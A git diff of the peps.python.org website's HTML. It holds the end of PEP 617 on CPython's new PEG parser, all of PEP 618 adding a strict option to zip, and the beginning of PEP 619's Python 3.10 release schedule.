A PEG (Parsing Expression Grammar) grammar differs from a context-free grammar +(like the current one) in the fact that the way it is written more closely +reflects how the parser will operate when parsing it. The fundamental technical +difference is that the choice operator is ordered. This means that when writing:

+
rule: A | B | C
+
+
+

a context-free-grammar parser (like an LL(1) parser) will generate constructions +that given an input string will deduce which alternative (A, B or C) +must be expanded, while a PEG parser will check if the first alternative succeeds +and only if it fails, will it continue with the second or the third one in the +order in which they are written. This makes the choice operator not commutative.

+

Unlike LL(1) parsers, PEG-based parsers cannot be ambiguous: if a string parses, +it has exactly one valid parse tree. This means that a PEG-based parser cannot +suffer from the ambiguity problems described in the previous section.

+

PEG parsers are usually constructed as a recursive descent parser in which every +rule in the grammar corresponds to a function in the program implementing the +parser and the parsing expression (the “expansion” or “definition” of the rule) +represents the “code” in said function. Each parsing function conceptually takes +an input string as its argument, and yields one of the following results:

+
    +
  • A “success” result. This result indicates that the expression can be parsed by +that rule and the function may optionally move forward or consume one or more +characters of the input string supplied to it.
  • +
  • A “failure” result, in which case no input is consumed.
  • +
+

Notice that “failure” results do not imply that the program is incorrect or a +parsing failure because as the choice operator is ordered, a “failure” result +merely indicates “try the following option”. A direct implementation of a PEG +parser as a recursive descent parser will present exponential time performance in +the worst case as compared with LL(1) parsers, because PEG parsers have infinite lookahead +(this means that they can consider an arbitrary number of tokens before deciding +for a rule). Usually, PEG parsers avoid this exponential time complexity with a +technique called “packrat parsing” [1] which not only loads the entire +program in memory before parsing it but also allows the parser to backtrack +arbitrarily. This is made efficient by memoizing the rules already matched for +each position. The cost of the memoization cache is that the parser will naturally +use more memory than a simple LL(1) parser, which normally are table-based. We +will explain later in this document why we consider this cost acceptable.

+
+
+

Rationale

+

In this section, we describe a list of problems that are present in the current parser +machinery in CPython that motivates the need for a new parser.

+
+

Some rules are not actually LL(1)

+

Although the Python grammar is technically an LL(1) grammar (because it is parsed by +an LL(1) parser) several rules are not LL(1) and several workarounds are +implemented in the grammar and in other parts of CPython to deal with this. For +example, consider the rule for assignment expressions:

+
namedexpr_test: [NAME ':='] test
+
+
+

This simple rule is not compatible with the Python grammar as NAME is among the +elements of the first set of the rule test. To work around this limitation the +actual rule that appears in the current grammar is:

+
namedexpr_test: test [':=' test]
+
+
+

Which is a much broader rule than the previous one allowing constructs like [x +for x in y] := [1,2,3]. The way the rule is limited to its desired form is by +disallowing these unwanted constructions when transforming the parse tree to the +abstract syntax tree. This is not only inelegant but a considerable maintenance +burden as it forces the AST creation routines and the compiler into a situation in +which they need to know how to separate valid programs from invalid programs, +which should be a responsibility solely of the parser. This also leads to the +actual grammar file not reflecting correctly what the actual grammar is (that +is, the collection of all valid Python programs).

+

Similar workarounds appear in multiple other rules of the current grammar. +Sometimes this problem is unsolvable. For instance, bpo-12782: Multiple context +expressions do not support parentheses for continuation across lines shows how making an LL(1) rule that supports +writing:

+
with (
+    open("a_really_long_foo") as foo,
+    open("a_really_long_baz") as baz,
+    open("a_really_long_bar") as bar
+):
+  ...
+
+
+

is not possible since the first sets of the grammar items that can +appear as context managers include the open parenthesis, making the rule +ambiguous. This rule is not only consistent with other parts of the language (like +the rule for multiple imports), but is also very useful to auto-formatting tools, +as parenthesized groups are normally used to group elements to be +formatted together (in the same way the tools operate on the contents of lists, +sets…).

+
+
+

Complicated AST parsing

+

Another problem of the current parser is that there is a huge coupling between the +AST generation routines and the particular shape of the produced parse trees. This +makes the code for generating the AST especially complicated as many actions and +choices are implicit. For instance, the AST generation code knows what +alternatives of a certain rule are produced based on the number of child nodes +present in a given parse node. This makes the code difficult to follow as this +property is not directly related to the grammar file and is influenced by +implementation details. As a result of this, a considerable amount of the AST +generation code needs to deal with inspecting and reasoning about the particular +shape of the parse trees that it receives.

+
+
+

Lack of left recursion

+

As described previously, a limitation of LL(1) grammars is that they cannot allow +left-recursion. This makes writing some rules very unnatural and far from how +programmers normally think about the program. For instance this construct (a simpler +variation of several rules present in the current grammar):

+
expr: expr '+' term | term
+
+
+

cannot be parsed by an LL(1) parser. The traditional remedy is to rewrite the +grammar to circumvent the problem:

+
expr: term ('+' term)*
+
+
+

The problem that appears with this form is that the parse tree is forced to have a +very unnatural shape. This is because with this rule, for the input program a + +b + c the parse tree will be flattened (['a', '+', 'b', '+', 'c']) and must +be post-processed to construct a left-recursive parse tree ([['a', '+', 'b'], +'+', 'c']). Being forced to write the second rule not only leads to the parse +tree not correctly reflecting the desired associativity, but also imposes further +pressure on later compilation stages to detect and post-process these cases.

+
+
+

Intermediate parse tree

+

The last problem present in the current parser is the intermediate creation of a +parse tree or Concrete Syntax Tree that is later transformed to an Abstract Syntax +Tree. Although the construction of a CST is very common in parser and compiler +pipelines, in CPython this intermediate CST is not used by anything else (it is +only indirectly exposed by the parser module and a surprisingly small part of +the code in the CST production is reused in the module). Which is worse: the whole +tree is kept in memory, keeping many branches that consist of chains of nodes with +a single child. This has been shown to consume a considerable amount of memory (for +instance in bpo-26415: Excessive peak memory consumption by the Python +parser).

+

Having to produce an intermediate result between the grammar and the AST is not only +undesirable but also makes the AST generation step much more complicated, raising +considerably the maintenance burden.

+
+
+
+

The new proposed PEG parser

+

The new proposed PEG parser contains the following pieces:

+
    +
  • A parser generator that can read a grammar file and produce a PEG parser +written in Python or C that can parse said grammar.
  • +
  • A PEG meta-grammar that automatically generates a Python parser that is used +for the parser generator itself (this means that there are no manually-written +parsers).
  • +
  • A generated parser (using the parser generator) that can directly produce C and +Python AST objects.
  • +
+
+

Left recursion

+

PEG parsers normally do not support left recursion but we have implemented a +technique similar to the one described in Medeiros et al. [2] but using the +memoization cache instead of static variables. This approach is closer to the one +described in Warth et al. [3]. This allows us to write not only simple left-recursive +rules but also more complicated rules that involve indirect left-recursion like:

+
rule1: rule2 | 'a'
+rule2: rule3 | 'b'
+rule3: rule1 | 'c'
+
+
+

and “hidden left-recursion” like:

+
rule: 'optional'? rule '@' some_other_rule
+
+
+
+
+

Syntax

+

The grammar consists of a sequence of rules of the form:

+
rule_name: expression
+
+
+

Optionally, a type can be included right after the rule name, which +specifies the return type of the C or Python function corresponding to +the rule:

+
rule_name[return_type]: expression
+
+
+

If the return type is omitted, then a void * is returned in C and an +Any in Python.

+
+

Grammar Expressions

+
+
# comment
+

Python-style comments.

+
+
+
e1 e2
+

Match e1, then match e2.

+
rule_name: first_rule second_rule
+
+
+
+
+
e1 | e2
+

Match e1 or e2.

+

The first alternative can also appear on the line after the rule name +for formatting purposes. In that case, a | must be used before the +first alternative, like so:

+
rule_name[return_type]:
+    | first_alt
+    | second_alt
+
+
+
+
+
( e )
+

Match e.

+
rule_name: (e)
+
+
+

A slightly more complex and useful example includes using the grouping +operator together with the repeat operators:

+
rule_name: (e1 e2)*
+
+
+
+
+
[ e ] or e?
+

Optionally match e.

+
rule_name: [e]
+
+
+

A more useful example includes defining that a trailing comma is +optional:

+
rule_name: e (',' e)* [',']
+
+
+
+
+
e*
+

Match zero or more occurrences of e.

+
rule_name: (e1 e2)*
+
+
+
+
+
e+
+

Match one or more occurrences of e.

+
rule_name: (e1 e2)+
+
+
+
+
+
s.e+
+

Match one or more occurrences of e, separated by s. The generated parse +tree does not include the separator. This is otherwise identical to +(e (s e)*).

+
rule_name: ','.e+
+
+
+
+
+
&e
+

Succeed if e can be parsed, without consuming any input.

+
+
+
!e
+

Fail if e can be parsed, without consuming any input.

+

An example taken from the proposed Python grammar specifies that a primary +consists of an atom, which is not followed by a . or a ( or a +[:

+
primary: atom !'.' !'(' !'['
+
+
+
+
+
~
+

Commit to the current alternative, even if it fails to parse.

+
rule_name: '(' ~ some_rule ')' | some_alt
+
+
+

In this example, if a left parenthesis is parsed, then the other +alternative won’t be considered, even if some_rule or ‘)’ fail to be +parsed.

+
+
+
+

Variables in the Grammar

+

A subexpression can be named by preceding it with an identifier and an += sign. The name can then be used in the action (see below), like this:

+
rule_name[return_type]: '(' a=some_other_rule ')' { a }
+
+
+
+
+
+

Grammar actions

+

To avoid the intermediate steps that obscure the relationship between the +grammar and the AST generation the proposed PEG parser allows directly +generating AST nodes for a rule via grammar actions. Grammar actions are +language-specific expressions that are evaluated when a grammar rule is +successfully parsed. These expressions can be written in Python or C +depending on the desired output of the parser generator. This means that if +one would want to generate a parser in Python and another in C, two grammar +files should be written, each one with a different set of actions, keeping +everything else apart from said actions identical in both files. As an +example of a grammar with Python actions, the piece of the parser generator +that parses grammar files is bootstrapped from a meta-grammar file with +Python actions that generate the grammar tree as a result of the parsing.

+

In the specific case of the new proposed PEG grammar for Python, having +actions allows directly describing how the AST is composed in the grammar +itself, making it more clear and maintainable. This AST generation process is +supported by the use of some helper functions that factor out common AST +object manipulations and some other required operations that are not directly +related to the grammar.

+

To indicate these actions each alternative can be followed by the action code +inside curly-braces, which specifies the return value of the alternative:

+
rule_name[return_type]:
+    | first_alt1 first_alt2 { first_alt1 }
+    | second_alt1 second_alt2 { second_alt1 }
+
+
+

If the action is omitted and C code is being generated, then there are two +different possibilities:

+
    +
  1. If there’s a single name in the alternative, this gets returned.
  2. +
  3. If not, a dummy name object gets returned (this case should be avoided).
  4. +
+

If the action is omitted and Python code is being generated, then a list +with all the parsed expressions gets returned (this is meant for debugging).

+

The full meta-grammar for the grammars supported by the PEG generator is:

+
start[Grammar]: grammar ENDMARKER { grammar }
+
+grammar[Grammar]:
+    | metas rules { Grammar(rules, metas) }
+    | rules { Grammar(rules, []) }
+
+metas[MetaList]:
+    | meta metas { [meta] + metas }
+    | meta { [meta] }
+
+meta[MetaTuple]:
+    | "@" NAME NEWLINE { (name.string, None) }
+    | "@" a=NAME b=NAME NEWLINE { (a.string, b.string) }
+    | "@" NAME STRING NEWLINE { (name.string, literal_eval(string.string)) }
+
+rules[RuleList]:
+    | rule rules { [rule] + rules }
+    | rule { [rule] }
+
+rule[Rule]:
+    | rulename ":" alts NEWLINE INDENT more_alts DEDENT {
+          Rule(rulename[0], rulename[1], Rhs(alts.alts + more_alts.alts)) }
+    | rulename ":" NEWLINE INDENT more_alts DEDENT { Rule(rulename[0], rulename[1], more_alts) }
+    | rulename ":" alts NEWLINE { Rule(rulename[0], rulename[1], alts) }
+
+rulename[RuleName]:
+    | NAME '[' type=NAME '*' ']' {(name.string, type.string+"*")}
+    | NAME '[' type=NAME ']' {(name.string, type.string)}
+    | NAME {(name.string, None)}
+
+alts[Rhs]:
+    | alt "|" alts { Rhs([alt] + alts.alts)}
+    | alt { Rhs([alt]) }
+
+more_alts[Rhs]:
+    | "|" alts NEWLINE more_alts { Rhs(alts.alts + more_alts.alts) }
+    | "|" alts NEWLINE { Rhs(alts.alts) }
+
+alt[Alt]:
+    | items '$' action { Alt(items + [NamedItem(None, NameLeaf('ENDMARKER'))], action=action) }
+    | items '$' { Alt(items + [NamedItem(None, NameLeaf('ENDMARKER'))], action=None) }
+    | items action { Alt(items, action=action) }
+    | items { Alt(items, action=None) }
+
+items[NamedItemList]:
+    | named_item items { [named_item] + items }
+    | named_item { [named_item] }
+
+named_item[NamedItem]:
+    | NAME '=' ~ item {NamedItem(name.string, item)}
+    | item {NamedItem(None, item)}
+    | it=lookahead {NamedItem(None, it)}
+
+lookahead[LookaheadOrCut]:
+    | '&' ~ atom {PositiveLookahead(atom)}
+    | '!' ~ atom {NegativeLookahead(atom)}
+    | '~' {Cut()}
+
+item[Item]:
+    | '[' ~ alts ']' {Opt(alts)}
+    |  atom '?' {Opt(atom)}
+    |  atom '*' {Repeat0(atom)}
+    |  atom '+' {Repeat1(atom)}
+    |  sep=atom '.' node=atom '+' {Gather(sep, node)}
+    |  atom {atom}
+
+atom[Plain]:
+    | '(' ~ alts ')' {Group(alts)}
+    | NAME {NameLeaf(name.string) }
+    | STRING {StringLeaf(string.string)}
+
+# Mini-grammar for the actions
+
+action[str]: "{" ~ target_atoms "}" { target_atoms }
+
+target_atoms[str]:
+    | target_atom target_atoms { target_atom + " " + target_atoms }
+    | target_atom { target_atom }
+
+target_atom[str]:
+    | "{" ~ target_atoms "}" { "{" + target_atoms + "}" }
+    | NAME { name.string }
+    | NUMBER { number.string }
+    | STRING { string.string }
+    | "?" { "?" }
+    | ":" { ":" }
+
+
+

As an illustrative example this simple grammar file allows directly +generating a full parser that can parse simple arithmetic expressions and that +returns a valid C-based Python AST:

+
start[mod_ty]: a=expr_stmt* $ { Module(a, NULL, p->arena) }
+expr_stmt[stmt_ty]: a=expr NEWLINE { _Py_Expr(a, EXTRA) }
+expr[expr_ty]:
+    | l=expr '+' r=term { _Py_BinOp(l, Add, r, EXTRA) }
+    | l=expr '-' r=term { _Py_BinOp(l, Sub, r, EXTRA) }
+    | t=term { t }
+
+term[expr_ty]:
+    | l=term '*' r=factor { _Py_BinOp(l, Mult, r, EXTRA) }
+    | l=term '/' r=factor { _Py_BinOp(l, Div, r, EXTRA) }
+    | f=factor { f }
+
+factor[expr_ty]:
+    | '(' e=expr ')' { e }
+    | a=atom { a }
+
+atom[expr_ty]:
+    | n=NAME { n }
+    | n=NUMBER { n }
+    | s=STRING { s }
+
+
+

Here EXTRA is a macro that expands to start_lineno, start_col_offset, +end_lineno, end_col_offset, p->arena, those being variables automatically +injected by the parser; p points to an object that holds on to all state +for the parser.

+

A similar grammar written to target Python AST objects:

+
start: expr NEWLINE? ENDMARKER { ast.Expression(expr) }
+expr:
+    | expr '+' term { ast.BinOp(expr, ast.Add(), term) }
+    | expr '-' term { ast.BinOp(expr, ast.Sub(), term) }
+    | term { term }
+
+term:
+    | l=term '*' r=factor { ast.BinOp(l, ast.Mult(), r) }
+    | term '/' factor { ast.BinOp(term, ast.Div(), factor) }
+    | factor { factor }
+
+factor:
+    | '(' expr ')' { expr }
+    | atom { atom }
+
+atom:
+    | NAME { ast.Name(id=name.string, ctx=ast.Load()) }
+    | NUMBER { ast.Constant(value=ast.literal_eval(number.string)) }
+
+
+
+
+
+

Migration plan

+

This section describes the migration plan when porting to the new PEG-based parser +if this PEP is accepted. The migration will be executed in a series of steps that allow +initially to fallback to the previous parser if needed:

+
    +
  1. Starting with Python 3.9 alpha 6, include the new PEG-based parser machinery in CPython +with a command-line flag and environment variable that allows switching between +the new and the old parsers together with explicit APIs that allow invoking the +new and the old parsers independently. At this step, all Python APIs like ast.parse +and compile will use the parser set by the flags or the environment variable and +the default parser will be the new PEG-based parser.
  2. +
  3. Between Python 3.9 and Python 3.10, the old parser and related code (like the +“parser” module) will be kept until a new Python release happens (Python 3.10). In +the meanwhile and until the old parser is removed, no new Python Grammar +addition will be added that requires the PEG parser. This means that the grammar +will be kept LL(1) until the old parser is removed.
  4. +
  5. In Python 3.10, remove the old parser, the command-line flag, the environment +variable and the “parser” module and related code.
  6. +
+
+
+

Performance and validation

+

We have done extensive timing and validation of the new parser, and +this gives us confidence that the new parser is of high enough quality +to replace the current parser.

+
+

Validation

+

To start with validation, we regularly compile the entire Python 3.8 +stdlib and compare every aspect of the resulting AST with that +produced by the standard compiler. (In the process we found a few bugs +in the standard parser’s treatment of line and column numbers, which +we have all fixed upstream via a series of issues and PRs.)

+

We have also occasionally compiled a much larger codebase (the approx. +3800 most popular packages on PyPI) and this has helped us find a (very) +few additional bugs in the new parser.

+

(One area we have not explored extensively is rejection of all wrong +programs. We have unit tests that check for a certain number of +explicit rejections, but more work could be done, e.g. by using a +fuzzer that inserts random subtle bugs into existing code. We’re open +to help in this area.)

+
+
+

Performance

+

We have tuned the performance of the new parser to come within 10% of +the current parser both in speed and memory consumption. While the +PEG/packrat parsing algorithm inherently consumes more memory than the +current LL(1) parser, we have an advantage because we don’t construct +an intermediate CST.

+

Below are some benchmarks. These are focused on compiling source code +to bytecode, because this is the most realistic situation. Returning +an AST to Python code is not as representative, because the process to +convert the internal AST (only accessible to C code) to an +external AST (an instance of ast.AST) takes more time than the +parser itself.

+

All measurements reported here are done on a recent MacBook Pro, +taking the median of three runs. No particular care was taken to stop +other applications running on the same machine.

+

The first timings are for our canonical test file, which has 100,000 +lines endlessly repeating the following three lines:

+
1 + 2 + 4 + 5 + 6 + 7 + 8 + 9 + 10 + ((((((11 * 12 * 13 * 14 * 15 + 16 * 17 + 18 * 19 * 20))))))
+2*3 + 4*5*6
+12 + (2 * 3 * 4 * 5 + 6 + 7 * 8)
+
+
+
    +
  • Just parsing and throwing away the internal AST takes 1.16 seconds +with a max RSS of 681 MiB.
  • +
  • Parsing and converting to ast.AST takes 6.34 seconds, max RSS +1029 MiB.
  • +
  • Parsing and compiling to bytecode takes 1.28 seconds, max RSS 681 +MiB.
  • +
  • With the current parser, parsing and compiling takes 1.44 seconds, +max RSS 836 MiB.
  • +
+

For this particular test file, the new parser is faster and uses less +memory than the current parser (compare the last two bullets).

+

We also did timings with a more realistic payload, the entire Python +3.8 stdlib. This payload consists of 1,641 files, 749,570 lines, +27,622,497 bytes. (Though 11 files can’t be compiled by any Python 3 +parser due to encoding issues, sometimes intentional.)

+
    +
  • Compiling and throwing away the internal AST took 2.141 seconds. +That’s 350,040 lines/sec, or 12,899,367 bytes/sec. The max RSS was +74 MiB (the largest file in the stdlib is much smaller than our +canonical test file).
  • +
  • Compiling to bytecode took 3.290 seconds. That’s 227,861 lines/sec, +or 8,396,942 bytes/sec. Max RSS 77 MiB.
  • +
  • Compiling to bytecode using the current parser took 3.367 seconds. +That’s 222,620 lines/sec, or 8,203,780 bytes/sec. Max RSS 70 MiB.
  • +
+

Comparing the last two bullets we find that the new parser is slightly +faster but uses slightly (about 10%) more memory. We believe this is +acceptable. (Also, there are probably some more tweaks we can make to +reduce memory usage.)

+
+
+
+

Rejected Alternatives

+

We did not seriously consider alternative ways to implement the new +parser, but here’s a brief discussion of LALR(1).

+

Thirty years ago the first author decided to go his own way with +Python’s parser rather than using LALR(1), which was the industry +standard at the time (e.g. Bison and Yacc). The reasons were +primarily emotional (gut feelings, intuition), based on past experience +using Yacc in other projects, where grammar development took more +effort than anticipated (in part due to shift-reduce conflicts). A +specific criticism of Bison and Yacc that still holds is that their +meta-grammar (the notation used to feed the grammar into the parser +generator) does not support EBNF conveniences like +[optional_clause] or (repeated_clause)*. Using a custom +parser generator, a syntax tree matching the structure of the grammar +could be generated automatically, and with EBNF that tree could match +the “human-friendly” structure of the grammar.

+

Other variants of LR were not considered, nor was LL (e.g. ANTLR). +PEG was selected because it was easy to understand given a basic +understanding of recursive-descent parsing.

+
+
+

References

+ +

[4] Guido’s series on PEG parsing + https://medium.com/@gvanrossum_83706/peg-parsing-series-de5d41b2ed60

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0617.rst

+

Last modified: 2023-12-18 21:39:13 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0618/index.html b/pep-0618/index.html new file mode 100644 index 00000000000..f1ba87c064c --- /dev/null +++ b/pep-0618/index.html @@ -0,0 +1,498 @@ + + + + + + + + PEP 618 – Add Optional Length-Checking To zip | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 618 – Add Optional Length-Checking To zip

+
+
Author:
+
Brandt Bucher <brandt at python.org>
+
Sponsor:
+
Antoine Pitrou <antoine at python.org>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-May-2020
+
Python-Version:
+
3.10
+
Post-History:
+
01-May-2020, 10-May-2020, 16-Jun-2020
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding an optional strict boolean keyword +parameter to the built-in zip. When enabled, a ValueError is +raised if one of the arguments is exhausted before the others.

+
+
+

Motivation

+

It is clear from the author’s personal experience and a survey of the +standard library that much (if not most) zip usage +involves iterables that must be of equal length. Sometimes this +invariant is proven true from the context of the surrounding code, but +often the data being zipped is passed from the caller, sourced +separately, or generated in some fashion. In any of these cases, the +default behavior of zip means that faulty refactoring or logic +errors could easily result in silently losing data. These bugs are +not only difficult to diagnose, but difficult to even detect at all.

+

It is easy to come up with simple cases where this could be a problem. +For example, the following code may work fine when items is a +sequence, but silently start producing shortened, mismatched results +if items is refactored by the caller to be a consumable iterator:

+
def apply_calculations(items):
+    transformed = transform(items)
+    for i, t in zip(items, transformed):
+        yield calculate(i, t)
+
+
+

There are several other ways in which zip is commonly used. +Idiomatic tricks are especially susceptible, because they are often +employed by users who lack a complete understanding of how the code +works. One example is unpacking into zip to lazily “unzip” or +“transpose” nested iterables:

+
>>> x = [[1, 2, 3], ["one" "two" "three"]]
+>>> xt = list(zip(*x))
+
+
+

Another is “chunking” data into equal-sized groups:

+
>>> n = 3
+>>> x = range(n ** 2),
+>>> xn = list(zip(*[iter(x)] * n))
+
+
+

In the first case, non-rectangular data is usually a logic error. In +the second case, data with a length that is not a multiple of n is +often an error as well. However, both of these idioms will silently +omit the tail-end items of malformed input.

+

Perhaps most convincingly, the use of zip in the standard-library +ast module created a bug in literal_eval which silently +dropped parts of malformed nodes:

+
>>> from ast import Constant, Dict, literal_eval
+>>> nasty_dict = Dict(keys=[Constant(None)], values=[])
+>>> literal_eval(nasty_dict)  # Like eval("{None: }")
+{}
+
+
+

In fact, the author has counted dozens of other call sites in Python’s standard library and tooling where it +would be appropriate to enable this new feature immediately.

+
+
+

Rationale

+

Some critics assert that constant boolean switches are a “code-smell”, +or go against Python’s design philosophy. However, Python currently +contains several examples of boolean keyword parameters on built-in +functions which are typically called with compile-time constants:

+
    +
  • compile(..., dont_inherit=True)
  • +
  • open(..., closefd=False)
  • +
  • print(..., flush=True)
  • +
  • sorted(..., reverse=True)
  • +
+

Many more exist in the standard library.

+

The idea and name for this new parameter were originally proposed +by Ram Rachum. The thread received over 100 replies, with the +alternative “equal” receiving a similar amount of support.

+

The author does not have a strong preference between the two choices, +though “equal equals” is a bit awkward in prose. It may also +(wrongly) imply some notion of “equality” between the zipped items:

+
>>> z = zip([2.0, 4.0, 6.0], [2, 4, 8], equal=True)
+
+
+
+
+

Specification

+

When the built-in zip is called with the keyword-only argument +strict=True, the resulting iterator will raise a ValueError if +the arguments are exhausted at differing lengths. This error will +occur at the point when iteration would normally stop today.

+
+
+

Backward Compatibility

+

This change is fully backward-compatible. zip currently takes no +keyword arguments, and the “non-strict” default behavior when +strict is omitted remains unchanged.

+
+
+

Reference Implementation

+

The author has drafted a C implementation.

+

An approximate Python translation is:

+
def zip(*iterables, strict=False):
+    if not iterables:
+        return
+    iterators = tuple(iter(iterable) for iterable in iterables)
+    try:
+        while True:
+            items = []
+            for iterator in iterators:
+                items.append(next(iterator))
+            yield tuple(items)
+    except StopIteration:
+        if not strict:
+            return
+    if items:
+        i = len(items)
+        plural = " " if i == 1 else "s 1-"
+        msg = f"zip() argument {i+1} is shorter than argument{plural}{i}"
+        raise ValueError(msg)
+    sentinel = object()
+    for i, iterator in enumerate(iterators[1:], 1):
+        if next(iterator, sentinel) is not sentinel:
+            plural = " " if i == 1 else "s 1-"
+            msg = f"zip() argument {i+1} is longer than argument{plural}{i}"
+            raise ValueError(msg)
+
+
+
+
+

Rejected Ideas

+
+

Add itertools.zip_strict

+

This is the alternative with the most support on the Python-Ideas +mailing list, so it deserves to be discussed in some detail here. It +does not have any disqualifying flaws, and could work well enough as a +substitute if this PEP is rejected.

+

With that in mind, this section aims to outline why adding an optional +parameter to zip is a smaller change that ultimately does a better +job of solving the problems motivating this PEP.

+
+

Precedent

+

It seems that a great deal of the motivation driving this alternative +is that zip_longest already exists in itertools. However, +zip_longest is in many ways a much more complicated, specialized +utility: it takes on the responsibility of filling in missing values, +a job neither of the other variants needs to concern themselves with.

+

If both zip and zip_longest lived alongside each other in +itertools or as builtins, then adding zip_strict in the same +location would indeed be a much stronger argument. However, the new +“strict” variant is conceptually much closer to zip in interface +and behavior than zip_longest, while still not meeting the high +bar of being its own builtin. Given this situation, it seems most +natural for zip to grow this new option in-place.

+
+
+

Usability

+

If zip is capable of preventing this class of bug, it becomes much +simpler for users to enable the check at call sites with this +property. Compare this with importing a drop-in replacement for a +built-in utility, which feels somewhat heavy just to check a tricky +condition that should “always” be true.

+

Some have also argued that a new function buried in the standard +library is somehow more “discoverable” than a keyword parameter on the +built-in itself. The author does not agree with this assessment.

+
+
+

Maintenance Cost

+

While implementation should only be a secondary concern when making +usability improvements, it is important to recognize that adding a new +utility is significantly more complicated than modifying an existing +one. The CPython implementation accompanying this PEP is simple and +has no measurable performance impact on default zip behavior, +while adding an entirely new utility to itertools would require +either:

+
    +
  • Duplicating much of the existing zip logic, as zip_longest +already does.
  • +
  • Significantly refactoring either zip, zip_longest, or both +to share a common or inherited implementation (which may impact +performance).
  • +
+
+
+
+

Add Several “Modes” To Switch Between

+

This option only makes more sense than a binary flag if we anticipate +having three or more modes. The “obvious” three choices for these +enumerated or constant modes would be “shortest” (the current zip +behavior), “strict” (the proposed behavior), and “longest” +(the itertools.zip_longest behavior).

+

However, it doesn’t seem like adding behaviors other than the current +default and the proposed “strict” mode is worth the additional +complexity. The clearest candidate, “longest”, would require a new +fillvalue parameter (which is meaningless for both other modes). +This mode is also already handled perfectly by +itertools.zip_longest, and adding it would create two ways of +doing the same thing. It’s not clear which would be the “obvious” +choice: the mode parameter on the built-in zip, or the +long-lived namesake utility in itertools.

+
+
+

Add A Method Or Alternate Constructor To The zip Type

+

Consider the following two options, which have both been proposed:

+
>>> zm = zip(*iters).strict()
+>>> zd = zip.strict(*iters)
+
+
+

It’s not obvious which one will succeed, or how the other will fail. +If zip.strict is implemented as a method, zm will succeed, but +zd will fail in one of several confusing ways:

+
    +
  • Yield results that aren’t wrapped in a tuple (if iters contains +just one item, a zip iterator).
  • +
  • Raise a TypeError for an incorrect argument type (if iters +contains just one item, not a zip iterator).
  • +
  • Raise a TypeError for an incorrect number of arguments +(otherwise).
  • +
+

If zip.strict is implemented as a classmethod or +staticmethod, zd will succeed, and zm will silently yield +nothing (which is the problem we are trying to avoid in the first +place).

+

This proposal is further complicated by the fact that CPython’s actual +zip type is currently an undocumented implementation detail. This +means that choosing one of the above behaviors will effectively “lock +in” the current implementation (or at least require it to be emulated) +going forward.

+
+
+

Change The Default Behavior Of zip

+

There is nothing “wrong” with the default behavior of zip, since +there are many cases where it is indeed the correct way to handle +unequally-sized inputs. It’s extremely useful, for example, when +dealing with infinite iterators.

+

itertools.zip_longest already exists to service those cases where +the “extra” tail-end data is still needed.

+
+
+

Accept A Callback To Handle Remaining Items

+

While able to do basically anything a user could need, this solution +makes handling the more common cases (like rejecting mismatched +lengths) unnecessarily complicated and non-obvious.

+
+
+

Raise An AssertionError

+

There are no built-in functions or types that raise an +AssertionError as part of their API. Further, the official +documentation +simply reads (in its entirety):

+
+
Raised when an assert statement fails.
+

Since this feature has nothing to do with Python’s assert +statement, raising an AssertionError here would be inappropriate. +Users desiring a check that is disabled in optimized mode (like an +assert statement) can use strict=__debug__ instead.

+
+
+

Add A Similar Feature to map

+

This PEP does not propose any changes to map, since the use of +map with multiple iterable arguments is quite rare. However, this +PEP’s ruling shall serve as precedent such a future discussion (should +it occur).

+

If rejected, the feature is realistically not worth pursuing. If +accepted, such a change to map should not require its own PEP +(though, like all enhancements, its usefulness should be carefully +considered). For consistency, it should follow same API and semantics +debated here for zip.

+
+
+

Do Nothing

+

This option is perhaps the least attractive.

+

Silently truncated data is a particularly nasty class of bug, and +hand-writing a robust solution that gets this right isn’t trivial. +The real-world motivating examples from Python’s own standard library +are evidence that it’s very easy to fall into the sort of trap that +this feature aims to avoid.

+
+
+
+

References

+
+

Examples

+
+

Note

+

This listing is not exhaustive.

+
+ +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0618.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0619/index.html b/pep-0619/index.html new file mode 100644 index 00000000000..a60c8ccaa04 --- /dev/null +++ b/pep-0619/index.html @@ -0,0 +1,245 @@ + + + + + + + + PEP 619 – Python 3.10 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 619 – Python 3.10 Release Schedule

+
+
Author:
+
Pablo Galindo Salgado <pablogsal at python.org>
+
Status:
+
Active
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
25-May-2020
+
Python-Version:
+
3.10
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.10. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.10 Release Manager: Pablo Galindo Salgado
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard
  • +
+
+
+

Release Schedule

+
+

3.10.0 schedule

+

Note: the dates below use a 17-month development period that results +in a 12-month release cadence between feature versions, as defined by +PEP 602.

+

Actual:

+
    +
  • 3.10 development begins: Monday, 2020-05-18
  • +
  • 3.10.0 alpha 1: Monday, 2020-10-05
  • +
  • 3.10.0 alpha 2: Tuesday, 2020-11-03
  • +
  • 3.10.0 alpha 3: Monday, 2020-12-07
  • +
  • 3.10.0 alpha 4: Monday, 2021-01-04
  • +
  • 3.10.0 alpha 5: Wednesday, 2021-02-03
  • +
  • 3.10.0 alpha 6: Monday, 2021-03-01
  • +
  • 3.10.0 alpha 7: Tuesday, 2021-04-06
  • +
  • 3.10.0 beta 1: Monday, 2021-05-03 +(No new features beyond this point.)
  • +
  • 3.10.0 beta 2: Monday, 2021-05-31
  • +
  • 3.10.0 beta 3: Thursday, 2021-06-17
  • +
  • 3.10.0 beta 4: Saturday, 2021-07-10
  • +
